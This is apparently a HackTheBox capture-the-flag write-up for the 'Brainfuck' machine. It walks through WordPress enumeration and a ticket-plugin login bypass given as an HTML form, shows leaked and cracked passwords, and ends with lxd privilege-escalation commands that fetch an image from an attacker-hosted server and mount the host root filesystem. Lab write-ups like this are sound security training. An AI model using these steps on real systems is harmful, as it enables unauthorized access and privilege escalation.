Brainfuck machine is a vulnerable machine with Linux operating system which is among the retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Full Port Scan
Network scan 22/tcp ssh OpenSSH, 25/tcp smtp Postfix smtpd, 110/tcp pop3 Dovecot pop3d, 143/tcp imap Dovecot imapd, 443/tcp ssl/http nginx ports are open.
In the 443 port scan, domain name and DNS names were given to us here and we wrote them to /etc,7hosts file
Then let’s access these sites.
When we looked with Wapalanzlyzer, we realized that it uses wordpress CMS application, let’s scan it with wpscan.
Here we see that the ticket plugin version is old. Note it and continue enumueration
wpscan https://brainfuck.htb –disable-tls-checks –enumerate u
admin and administrator users have been detected.
We are looking for a vulnerability in the version of the WP Support Plus Responsive Ticket System plugin I detected.
We have seen Sql injection, let’s see how to use this vulnerability here
Create an html file according to the commands given here and put it in <form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php"> Username: <input type="text" name="username" value="administrator"> <input type="hidden" name="email" value="sth"> <input type="hidden" name="action" value="loginGuestFacebook"> <input type="submit" value="Login"> </form> We are expected to write. We provided this and presented we server with python and then we were able to log in when we sent this form.
When we deleted wp-admin/admin-ajax.php in the url section and continued, we saw that there was login from the admin user.
We can see it here on the admin page.
We were able to log in.
This way we accessed the admin dashboard.
Let’s provide enumeration here.
The dev updaye part that is written on the web comes to mind may be something related to SMTP.
Let’s enter smtp settings from plugins here.
The password “kHGuERB29DNiNE” was detected in smtp for user orestis.
Let’s use this information to establish a connection.
Hi there, your credentials for our “secret” forum are below 🙂
Here we have detected the credential information for the secret. Here we thought of the secret that exists as a subdomain, let’s try to connect there with this credential information
Here we see the form text related to the ssh key.
Here we see enceretyot messages.
Let’s try to make sense of them
We see that it is cryptolized as Vigenere
Let’s break these messages
We realized that it is id_rsa in https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa ulrlinde.
When we tried to connect to id_rsa, it asked us for a password, let’s break it with john the ripper
We cracked the ssh key and got 3poulakia! We got the password
Here we got our user flag, but we couldn’t access root because we don’t have root authorization.
The debug.txt encrypt.sage output.txt files on the desktop are remarkable. When we read them, we see them as rsa encrytp.
By breaking this, root.flag can also be read, but it does not give us ir Shell, so we investigated methods to obtain root Shell by providing local enumeration.
Here we see lxd.
Let’s see if this can be done privilege escalation.
The procedures given in the address were carried out one by one
commands applied sequentially
attacker on the machine
1- git clone https://github.com/saghul/lxd-alpine-builder.git
2- cd lxd-alpine-builder
4- python -m SimpleHTTPServer
on the target machine
1- wget 10.10.14.19:8000/alpine-v3.18-x86_64-20230927_0640.tar.gz
2- lxc image import ./alpine-v3.18-x86_64-20230927_0640.tar.gz –alias myimage
3- lxc image list
4- lxc init myimage ignite -c security.privileged=true
5- lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
6- lxc start ignite
7- lxc exec ignite /bin/sh
9- cd mnt/root/root
11- cat root.txt
This is how we got the root flag.